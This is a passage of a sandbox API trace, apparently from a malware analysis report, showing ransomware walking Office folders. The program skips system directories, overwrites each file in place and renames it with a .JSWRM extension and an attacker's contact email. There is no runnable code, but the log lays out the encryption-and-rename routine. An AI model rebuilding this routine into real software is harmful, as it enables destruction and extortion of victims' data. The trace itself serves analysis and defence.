lpMultiByteStr="PGLBL016.XML", lpUsedDefaultChar=0x0) returned 12 [0138.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL016.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL016.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL016.XML", lpUsedDefaultChar=0x0) returned 12 [0138.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.215] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL016.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl016.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.219] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=142576) returned 1 [0138.219] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.219] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x22cf0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x22cf0, lpOverlapped=0x0) returned 1 [0138.232] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.232] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x22cf0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x22cf0, lpOverlapped=0x0) returned 1 [0138.233] CloseHandle (hObject=0x238) returned 1 [0138.233] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL016.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl016.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL016.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl016.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.234] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d2f32c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d2f32c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d2f32c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x101bc, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGLBL020.XML", cAlternateFileName="")) returned 1 [0138.234] lstrcmpiW (lpString1="PGLBL020.XML", lpString2=".") returned 1 [0138.234] lstrcmpiW (lpString1="PGLBL020.XML", lpString2="..") returned 1 [0138.234] lstrcmpiW (lpString1="PGLBL020.XML", lpString2="...") returned 1 [0138.234] lstrcmpiW (lpString1="PGLBL020.XML", lpString2="windows") returned -1 [0138.234] lstrcmpiW (lpString1="PGLBL020.XML", lpString2="recovery") returned -1 [0138.234] lstrcmpiW (lpString1="PGLBL020.XML", lpString2="perflogs") returned 1 [0138.234] lstrcmpiW (lpString1="PGLBL020.XML", lpString2="documents and settings") returned 1 [0138.234] lstrcmpiW (lpString1="PGLBL020.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.234] lstrcmpiW (lpString1="PGLBL020.XML", lpString2="system volume information") returned -1 [0138.234] lstrcmpiW (lpString1="PGLBL020.XML", lpString2="msocache") returned 1 [0138.234] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL020.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.234] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL020.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL020.XML", lpUsedDefaultChar=0x0) returned 12 [0138.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL020.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL020.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL020.XML", lpUsedDefaultChar=0x0) returned 12 [0138.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.235] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.235] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL020.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl020.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.235] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=65980) returned 1 [0138.235] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.236] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x101b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x101b0, lpOverlapped=0x0) returned 1 [0138.242] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.242] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x101b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x101b0, lpOverlapped=0x0) returned 1 [0138.242] CloseHandle (hObject=0x238) returned 1 [0138.242] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL020.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl020.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL020.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl020.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.243] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d319566, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d319566, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d319566, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x24c9a, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGLBL022.XML", cAlternateFileName="")) returned 1 [0138.243] lstrcmpiW (lpString1="PGLBL022.XML", lpString2=".") returned 1 [0138.243] lstrcmpiW (lpString1="PGLBL022.XML", lpString2="..") returned 1 [0138.243] lstrcmpiW (lpString1="PGLBL022.XML", lpString2="...") returned 1 [0138.243] lstrcmpiW (lpString1="PGLBL022.XML", lpString2="windows") returned -1 [0138.243] lstrcmpiW (lpString1="PGLBL022.XML", lpString2="recovery") returned -1 [0138.243] lstrcmpiW (lpString1="PGLBL022.XML", lpString2="perflogs") returned 1 [0138.244] lstrcmpiW (lpString1="PGLBL022.XML", lpString2="documents and settings") returned 1 [0138.244] lstrcmpiW (lpString1="PGLBL022.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.244] lstrcmpiW (lpString1="PGLBL022.XML", lpString2="system volume information") returned -1 [0138.244] lstrcmpiW (lpString1="PGLBL022.XML", lpString2="msocache") returned 1 [0138.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL022.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL022.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL022.XML", lpUsedDefaultChar=0x0) returned 12 [0138.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL022.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL022.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL022.XML", lpUsedDefaultChar=0x0) returned 12 [0138.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.244] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL022.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl022.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.245] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=150682) returned 1 [0138.245] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.245] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x24c90, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x24c90, lpOverlapped=0x0) returned 1 [0138.255] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.255] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x24c90, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x24c90, lpOverlapped=0x0) returned 1 [0138.256] CloseHandle (hObject=0x238) returned 1 [0138.256] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL022.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl022.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL022.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl022.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.257] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d319566, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d319566, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d319566, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f4e6, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGLBL026.XML", cAlternateFileName="")) returned 1 [0138.257] lstrcmpiW (lpString1="PGLBL026.XML", lpString2=".") returned 1 [0138.257] lstrcmpiW (lpString1="PGLBL026.XML", lpString2="..") returned 1 [0138.257] lstrcmpiW (lpString1="PGLBL026.XML", lpString2="...") returned 1 [0138.257] lstrcmpiW (lpString1="PGLBL026.XML", lpString2="windows") returned -1 [0138.257] lstrcmpiW (lpString1="PGLBL026.XML", lpString2="recovery") returned -1 [0138.257] lstrcmpiW (lpString1="PGLBL026.XML", lpString2="perflogs") returned 1 [0138.257] lstrcmpiW (lpString1="PGLBL026.XML", lpString2="documents and settings") returned 1 [0138.257] lstrcmpiW (lpString1="PGLBL026.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.257] lstrcmpiW (lpString1="PGLBL026.XML", lpString2="system volume information") returned -1 [0138.257] lstrcmpiW (lpString1="PGLBL026.XML", lpString2="msocache") returned 1 [0138.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL026.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL026.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL026.XML", lpUsedDefaultChar=0x0) returned 12 [0138.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL026.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL026.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL026.XML", lpUsedDefaultChar=0x0) returned 12 [0138.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.257] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL026.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl026.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.258] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=128230) returned 1 [0138.258] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.258] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x1f4e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x1f4e0, lpOverlapped=0x0) returned 1 [0138.269] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.269] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x1f4e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x1f4e0, lpOverlapped=0x0) returned 1 [0138.269] CloseHandle (hObject=0x238) returned 1 [0138.269] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL026.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl026.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL026.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl026.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.270] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d2f32c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d2f32c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d319566, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8a3e, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGLBL027.XML", cAlternateFileName="")) returned 1 [0138.270] lstrcmpiW (lpString1="PGLBL027.XML", lpString2=".") returned 1 [0138.270] lstrcmpiW (lpString1="PGLBL027.XML", lpString2="..") returned 1 [0138.270] lstrcmpiW (lpString1="PGLBL027.XML", lpString2="...") returned 1 [0138.270] lstrcmpiW (lpString1="PGLBL027.XML", lpString2="windows") returned -1 [0138.270] lstrcmpiW (lpString1="PGLBL027.XML", lpString2="recovery") returned -1 [0138.271] lstrcmpiW (lpString1="PGLBL027.XML", lpString2="perflogs") returned 1 [0138.271] lstrcmpiW (lpString1="PGLBL027.XML", lpString2="documents and settings") returned 1 [0138.271] lstrcmpiW (lpString1="PGLBL027.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.271] lstrcmpiW (lpString1="PGLBL027.XML", lpString2="system volume information") returned -1 [0138.271] lstrcmpiW (lpString1="PGLBL027.XML", lpString2="msocache") returned 1 [0138.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL027.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL027.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL027.XML", lpUsedDefaultChar=0x0) returned 12 [0138.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL027.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL027.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL027.XML", lpUsedDefaultChar=0x0) returned 12 [0138.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.271] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL027.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl027.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.272] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=35390) returned 1 [0138.272] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.272] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x8a30, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x8a30, lpOverlapped=0x0) returned 1 [0138.275] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.275] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x8a30, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x8a30, lpOverlapped=0x0) returned 1 [0138.276] CloseHandle (hObject=0x238) returned 1 [0138.276] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL027.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl027.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL027.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl027.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.277] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d2f32c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d2f32c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d2f32c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x266a4, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGLBL044.XML", cAlternateFileName="")) returned 1 [0138.277] lstrcmpiW (lpString1="PGLBL044.XML", lpString2=".") returned 1 [0138.277] lstrcmpiW (lpString1="PGLBL044.XML", lpString2="..") returned 1 [0138.277] lstrcmpiW (lpString1="PGLBL044.XML", lpString2="...") returned 1 [0138.277] lstrcmpiW (lpString1="PGLBL044.XML", lpString2="windows") returned -1 [0138.277] lstrcmpiW (lpString1="PGLBL044.XML", lpString2="recovery") returned -1 [0138.277] lstrcmpiW (lpString1="PGLBL044.XML", lpString2="perflogs") returned 1 [0138.277] lstrcmpiW (lpString1="PGLBL044.XML", lpString2="documents and settings") returned 1 [0138.277] lstrcmpiW (lpString1="PGLBL044.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.277] lstrcmpiW (lpString1="PGLBL044.XML", lpString2="system volume information") returned -1 [0138.277] lstrcmpiW (lpString1="PGLBL044.XML", lpString2="msocache") returned 1 [0138.277] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL044.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.277] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL044.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL044.XML", lpUsedDefaultChar=0x0) returned 12 [0138.277] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL044.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.277] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL044.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL044.XML", lpUsedDefaultChar=0x0) returned 12 [0138.277] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.277] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.277] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL044.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl044.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.278] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=157348) returned 1 [0138.278] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.278] ReadFile (in: 